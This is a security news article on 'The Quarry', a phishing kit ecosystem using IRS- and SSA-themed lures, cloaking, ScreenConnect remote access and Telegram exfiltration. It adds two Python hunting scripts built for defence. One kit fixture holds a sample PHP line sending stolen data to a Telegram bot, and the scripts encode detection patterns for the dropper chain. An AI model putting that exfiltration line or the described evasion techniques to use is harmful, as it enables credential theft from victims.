
Researchers Uncover ‘The Quarry’ Phishing Network Used by Nearly 200 Criminal Affiliates

By: Jordan Vector, Cybersecurity Expert

Last updated: June 16, 2026

  • A single developer known as RockyBelling has assembled a full-service criminal toolkit that nearly 200 affiliates use worldwide to run IRS and SSA-themed phishing attacks against U.S. victims.

  • The operation combines advanced cloaking, real-time Telegram telemetry, and legitimate remote management software to steal credentials and maintain persistent access to compromised systems.

  • Security researchers tracked the ecosystem from April 2025 to April 2026, named it “The Quarry,” and urged defenders to hunt for its reusable technical signatures rather than treating each attack as isolated.

One developer. Nearly 200 criminal affiliates. A single threat actor known online as RockyBelling has built one of the most modular, commercially packaged phishing ecosystems targeting Americans today.

Security researchers spent a full year, from April 2025 to April 2026, mapping the operation, which they named “The Quarry.” It runs IRS- and Social Security Administration-themed phishing campaigns that predominantly hit U.S. victims.

One Developer, A Full Criminal Storefront

RockyBelling (also known as Rock, Rockky, and Mike) runs a Telegram channel called “Rocky War Room,” which had 194 subscribers at the time of analysis. The channel functions as a product catalog, announcement board, and support desk for his criminal services.

The toolkit includes phishing kits with built-in Adspect cloaking, a bulk email tool called Rocky Gmail Sender, credential harvesting panels, post-exploitation PowerShell scripts, and ScreenConnect remote management panels provisioned per affiliate.

Code and repository artifacts tied to his GitLab account, together with embedded Telegram bot tokens and matched infrastructure fingerprints, link everything back to one developer who actively maintains and updates the service, including an April 2026 release of a VBS dropper with a UAC bypass.

The researchers identified more than 40 distinct ScreenConnect panels and more than 80 campaign domains across the research window. The operation scales because the roles are split: affiliates handle distribution while RockyBelling handles the product.

How the Attack Gets In

The operation layers filtering techniques to keep researchers and scanners out while serving the lure only to likely victims. Initial checks screen out non-Windows user-agents and return benign pages to automated crawlers. Adspect, used here as a cloaking layer, fingerprints each visitor using WebGL data, timezone information, touch events, and other browser signals, and serves the phishing page only to profiles that match a real Windows user. The practical consequence for defenders is that a scanner fetching a reported URL with a default or headless user-agent will usually receive the decoy page and rate the site clean.

Bypass techniques are a common theme in cybercrime. A threat actor recently released alleged Cloudflare Turnstile bypass code on a cybercrime forum, one more example of how criminals trade evasion tooling.

When victims land on the fake page, they see a realistic copy of an IRS site, Social Security page, or trusted SaaS platform. The page tricks users into downloading a “Security Connector,” presenting remote management software as a routine security update. The download is a ScreenConnect MSI or EXE that installs silently once launched, handing the affiliate full remote access to the machine.

Telegram handles real-time telemetry. Every victim download event, IP address, user-agent string, and timestamp flows directly into an affiliate’s Telegram bot. This mobile-first monitoring model lets operators triage victims and act fast without needing persistent desktop infrastructure.

In April 2026, RockyBelling introduced a VBS dropper that no longer depends on the cloaked phishing page. The obfuscated script requests administrative rights through a UAC prompt, downloads a decoy PDF and a ScreenConnect installer from GitHub or GitLab, installs the client silently, opens the decoy file so the victim sees the document they expected, and then deletes itself to remove traces.
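The dropper chain above leaves a distinctive shape in process-creation telemetry: a script host (wscript.exe or cscript.exe) that ends up as an ancestor of a ScreenConnect installer launched with silent flags. The following is an added example, not tooling from the researchers or from the article, that walks such a chain over constructed Sysmon-style events. The field names, the `/qn` flag, the installer filename and the “deploy agent” parent used for the benign case are assumptions about how these events would look in a real environment.

```python
"""Flag a script-host-to-ScreenConnect silent-install chain in process telemetry.

Added illustration, not the researchers' detection logic. The events below are
constructed in a Sysmon Event ID 1-like shape (pid, ppid, image, cmd); flags,
paths and the deployment-agent parent are assumptions.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INSTALLERS = {"msiexec.exe"}
# ScreenConnect client packages are named like ScreenConnect.ClientSetup.msi/.exe (assumed).
SC_INSTALLER_RE = re.compile(r"screenconnect[\w.-]*\.(?:msi|exe)", re.IGNORECASE)
# Common silent-install switches; treat any of them as "no UI shown" (assumed set).
SILENT_FLAGS_RE = re.compile(r"(?:^|\s)/(?:qn|quiet|q|s|silent)\b", re.IGNORECASE)

# Constructed events. Order matters only for the order of findings.
EVENTS = [
    {"pid": 4120, "ppid": 980, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 5300, "ppid": 4120, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\v\Downloads\Tax_Notice.vbs"'},
    # Elevated child: Windows reports the requesting process as parent after UAC consent.
    {"pid": 5388, "ppid": 5300, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Users\v\AppData\Local\Temp\ScreenConnect.ClientSetup.msi" /qn'},
    {"pid": 5402, "ppid": 5300, "image": r"C:\Program Files\Adobe\Reader\AcroRd32.exe",
     "cmd": r'AcroRd32.exe "C:\Users\v\AppData\Local\Temp\IRS_Notice.pdf"'},
    # Benign-looking helpdesk push: same silent install, but no script host upstream.
    {"pid": 6000, "ppid": 1234, "image": r"C:\Program Files\DeployTool\agent.exe", "cmd": "agent.exe"},
    {"pid": 6010, "ppid": 6000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\DeployCache\ScreenConnect.ClientSetup.msi" /qn'},
    # Unrelated silent install: never a finding.
    {"pid": 6100, "ppid": 4120, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r'msiexec.exe /i "C:\Temp\7zip.msi" /qn'},
]


def basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(event, index, max_depth=4):
    """Yield parent, grandparent, ... up to max_depth, stopping at unknown or cyclic pids."""
    seen = set()
    cur = event
    for _ in range(max_depth):
        parent = index.get(cur["ppid"])
        if parent is None or parent["pid"] in seen:
            return
        seen.add(parent["pid"])
        yield parent
        cur = parent


def detect(events):
    """Return one finding per ScreenConnect installer launch, graded by context."""
    index = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        image = basename(e["image"])
        if not (image in INSTALLERS or SC_INSTALLER_RE.search(image)):
            continue
        if not SC_INSTALLER_RE.search(e["cmd"]):
            continue
        silent = bool(SILENT_FLAGS_RE.search(e["cmd"]))
        script_host = next(
            (basename(a["image"]) for a in ancestors(e, index) if basename(a["image"]) in SCRIPT_HOSTS),
            None,
        )
        if silent and script_host:
            severity = "high"      # script host + silent RMM install: the dropper pattern
        elif silent or script_host:
            severity = "medium"    # worth a look; may be a legitimate managed deployment
        else:
            severity = "low"
        findings.append({"pid": e["pid"], "severity": severity, "silent": silent,
                         "script_host": script_host, "cmd": e["cmd"]})
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["severity"], f["pid"], f["script_host"], f["cmd"])
```

Grading rather than a binary match matters here because ScreenConnect is legitimate software that many helpdesks push silently; the signal is the script-host ancestry combined with the silent install, not the installer alone.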

What Attackers Steal and How to Fight Back

Post-exploitation tooling targets U.S. tax fraud directly. PowerShell scripts extract six months of browser history and search recursively for W-2 files, sending results to Telegram. Logs from monitored bots also show AWS credentials and corporate secrets being harvested. Researchers say the evidence suggests Initial Access Broker activity and the possible sale of stolen access to ransomware groups.

Victims are overwhelmingly U.S.-based, though recorded infections have occurred in Egypt, Brazil, Germany, Japan, and Canada. Those non-U.S. cases likely include Americans working abroad, people with U.S. tax obligations, or users behind VPN services.

Defenders should focus on The Quarry’s reusable technical signatures: Adspect stream_id values reused across domains, characteristic PHP filenames such as de.php and docs.php, Telegram bot tokens embedded in webserver code, and the ScreenConnect JARM fingerprint. One caveat on the last item: JARM fingerprints the server’s TLS stack, so it identifies ScreenConnect deployments in general, legitimate ones included, and should be used to enumerate candidates that are then checked against the other artifacts rather than blocked outright. Organizations should block known malicious domains, monitor outbound connections to ScreenConnect panels that are not their own, and restrict Windows Script Host execution and script attachments such as .vbs.
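The hunting approach the researchers recommend, pivoting on artifacts the kit reuses across deployments, can be applied directly to captured phishing-kit files. The following is an added example written for this article, not the researchers’ tooling: it scans a constructed set of webserver files from several domains for embedded Telegram bot tokens, the characteristic PHP filenames, and Adspect stream_id values, then groups domains that share an artifact. The Telegram token pattern (numeric bot id, colon, 35-character secret) is the documented format; the `stream_id = '<uuid>'` layout, the sample domains, and every token and id shown are assumptions or fabricated sample values.

```python
"""Pivot on reusable kit artifacts across captured phishing-site files.

Added illustration (not the researchers' tooling). File contents, domains,
tokens and ids below are constructed; the stream_id layout is assumed.
"""
import re
from collections import defaultdict

# Telegram bot tokens: <numeric bot id>:<35 chars of [A-Za-z0-9_-]>.
TELEGRAM_TOKEN_RE = re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}(?![A-Za-z0-9_-])")
# Assumed: the kit stores the Adspect stream id as a UUID near the key name.
STREAM_ID_RE = re.compile(
    r"stream_id\W{1,8}([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})",
    re.IGNORECASE,
)
# Filenames the article names as characteristic of the kit.
KIT_FILENAMES = {"de.php", "docs.php"}

# Constructed sample: (domain, path) -> content. Tokens and ids are fake.
SAMPLE_FILES = {
    ("irs-refund-verify.example", "index.php"): (
        "<?php\n"
        "$stream_id = '5b1e0c3a-7a2f-4f1e-9c8d-2e4a6b8c0d1f';\n"
        "include 'adspect.php';\n"
    ),
    ("irs-refund-verify.example", "de.php"): (
        "<?php\n"
        "$bot = '123456789:AAHdQ7kx9JYxz2Lr4nP8sTvWq0uYbC3eFgH';\n"
        "file_get_contents(\"https://api.telegram.org/bot$bot/sendMessage?chat_id=...\");\n"
    ),
    ("ssa-benefits-secure.example", "docs.php"): (
        "<?php\n"
        "$bot = '987654321:AAGzyx9W8v7U6t5S4r3Q2p1O0nM9lK8jI7h';\n"
    ),
    ("ssa-benefits-secure.example", "config.php"): (
        "<?php $cfg = ['stream_id' => '5b1e0c3a-7a2f-4f1e-9c8d-2e4a6b8c0d1f'];\n"
    ),
    ("unrelated-blog.example", "index.php"): "<?php echo 'hello';\n",
}


def scan_files(files):
    """Map each artifact value to the domains it appears on; record kit filename hits."""
    tokens = defaultdict(set)
    stream_ids = defaultdict(set)
    kit_files = set()
    for (domain, path), content in files.items():
        if path.rsplit("/", 1)[-1].lower() in KIT_FILENAMES:
            kit_files.add((domain, path))
        for tok in TELEGRAM_TOKEN_RE.findall(content):
            tokens[tok].add(domain)
        for sid in STREAM_ID_RE.findall(content):
            stream_ids[sid.lower()].add(domain)
    return {"tokens": dict(tokens), "stream_ids": dict(stream_ids), "kit_files": kit_files}


def linked_domain_groups(findings):
    """Domains sharing a stream_id or bot token are treated as one kit deployment."""
    groups = []
    for kind in ("stream_ids", "tokens"):
        for value, domains in findings[kind].items():
            if len(domains) > 1:
                groups.append((kind, value, frozenset(domains)))
    return groups


if __name__ == "__main__":
    result = scan_files(SAMPLE_FILES)
    for kind, value, domains in linked_domain_groups(result):
        print(f"{kind} {value} shared by: {', '.join(sorted(domains))}")
    for domain, path in sorted(result["kit_files"]):
        print(f"kit filename: {domain}/{path}")
```

In the sample, the two lure domains use different bot tokens (one per affiliate) but the same stream_id, which is the kind of reuse that ties separate-looking campaigns back to one kit. Any recovered bot token is also worth feeding into network telemetry, since the kit calls api.telegram.org with the token in the URL path.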

According to experts, The Quarry proves how one well-supported criminal product can scale affiliate operations while evading traditional detection by blending legitimate remote management tools, effective cloaking, and mobile-first command and control. Defenders must treat these campaigns as a unified, service-driven threat, not isolated phishing incidents.


About the Author

Jordan Vector


Cybersecurity Expert

Jordan is a security researcher and advocate who focuses on making privacy practical. Whether he's explaining how to harden a browser or reporting on the latest surveillance disclosures, his goal is to equip readers with knowledge they can use immediately. Jordan believes that true security begins with understanding the digital landscape.
